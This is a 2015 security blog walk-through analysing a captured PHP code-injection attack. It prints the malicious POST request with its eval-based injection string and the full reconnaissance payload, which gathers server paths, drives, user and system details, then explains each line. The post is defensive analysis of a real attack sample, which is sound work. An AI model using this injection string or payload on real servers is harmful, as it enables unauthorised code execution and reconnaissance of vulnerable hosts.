Thursday, November 19, 2015

PHP Injection via post walk-thru

POST /yanyu/?q={${eval($_POST[u])}} HTTP/1.1

This malicious post looked pretty interested and worth mentioning. It's attempting to exploit a php vulnerability likely that allows for execution of code passes in as a post parameter. In this case the post looked like this and attempted to execute the php code listed in parameter 'u' (see below). The final goal of this as you'll see by reading the rest appears to be just data exfiltrations/information gathering about the vulnerable web server. No payload is actually delivered at this time.

u=@eval(get_magic_quotes_gpc()?stripslashes($_POST[chr(122).chr(48)]):$_POST[chr(122).chr(48)]); z0=603403;@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$root=isset($_SERVER['DOCUMENT_ROOT'])?$_SERVER['DOCUMENT_ROOT']:(isset($_SERVER['APPL_PHYSICAL_PATH'])?trim($_SERVER['APPL_PHYSICAL_PATH'],"\\"):(isset($_['PATH_TRANSLATED'])?str_replace($_SERVER["PHP_SELF"]):str_replace(str_replace("/","\\",isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:(isset($_SERVER["URL"])?$_SERVER["URL"]:$_SERVER["SCRIPT_NAME"])),"",isset($_SERVER["PATH_TRANSLATED"])?$_SERVER["PATH_TRANSLATED"]:$_SERVER["SCRIPT_FILENAME"])));$R="{$D}|".$root."|";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="|";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();

Let's go thru line by line

u=@eval(get_magic_quotes_gpc()?stripslashes($_POST[chr(122).chr(48)]):$_POST[chr(122).chr(48)]);

The above code is parameter u that gets executed by the http post mentioned above. First this it does is check to see if magic_quotes_gpc is enabled or not. If so, it needs to strip off the slashes before executing the rest of the payload, if not just use the raw payload. Where is the payload? When it's in the post parameter called z0 (122 = z, 48 = 0). I know that from asccitable.com.

z0=

The above code starts the real payload, the z0 parameter.

603403;

The above code not sure what it is for? my guess is maybe a version number. It's just an integer which when executed in php does nothing.

@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);


The above code sets several configuration settings. init_set is used to disable error messages. set_time_limit to 0 is used to disable time limits on execution. set_magic_quotes_runtime to 0 is used to disable magic quotes.

echo("->|");;


The above code will print characters to the screen (returned via the http request). this is the attacker indicating the start of the exfiltrated system information that he's going to grab.

$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")
   $D=dirname($_SERVER["PATH_TRANSLATED"]);


Next the attacker attempts to load the directory that the php file is currently located in on the server. He tries with 2 different methods.

$root=isset($_SERVER['DOCUMENT_ROOT'])?$_SERVER['DOCUMENT_ROOT']:
(isset($_SERVER['APPL_PHYSICAL_PATH'])?trim($_SERVER['APPL_PHYSICAL_PATH'],"\\"):
(isset($_['PATH_TRANSLATED'])?str_replace($_SERVER["PHP_SELF"]):
str_replace(str_replace("/","\\",isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:
(isset($_SERVER["URL"])?$_SERVER["URL"]:
$_SERVER["SCRIPT_NAME"])),"",isset($_SERVER["PATH_TRANSLATED"])?$_SERVER["PATH_TRANSLATED"]:
$_SERVER["SCRIPT_FILENAME"])));


The above goes thru a series of tertiary conditionals (?:) or essentially if statements to determine if various parameters are set, he's trying 1 at a time to determine the root folder for the website and saving it in $root

$R="{$D}|".$root."|";

The above code is going to start building a list of exfiltrated data about this web server that he'll send back to himself via the http response. This includes now the current folder and the web root folder.

if(substr($D,0,1)!="/"){
  foreach(range("A","Z") as $L)
   if(is_dir("{$L}:"))
    $R.="{$L}:";
}
$R.="|";


The above code appears to then see if the current directory starts with a / and if not loops thru looking for any folders with the single character name A thru Z. If it finds any, it appends them to the data exfiltration dump. Not exactly sure why unless those are standard folders the attacker uses as payload and he wants to see if it's already been there or not.

$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';
$usr=($u)?$u['name']:@get_current_user();


The above code will grab what security group or essentially permissions the current web user has.

$R.=php_uname();$R.="({$usr})";


The above code then appends the user security group information plus information about the system itself to the data exfilitration payload.

print $R;;echo("|<-");
die();


The above code finally prints all the information it wants to exfiltrate out to the http response. Then kills the process so the request returns. The attacker will likely then look for the special characters and if he sees then he knows he's got a vulnerable box, then he'll return in a few minutes with a payload that compromises the box.

Hope this helps.



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. ali.txt php injection walk-thru
  3. apache struts2 rce walk-thru


Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

No comments:

Post a Comment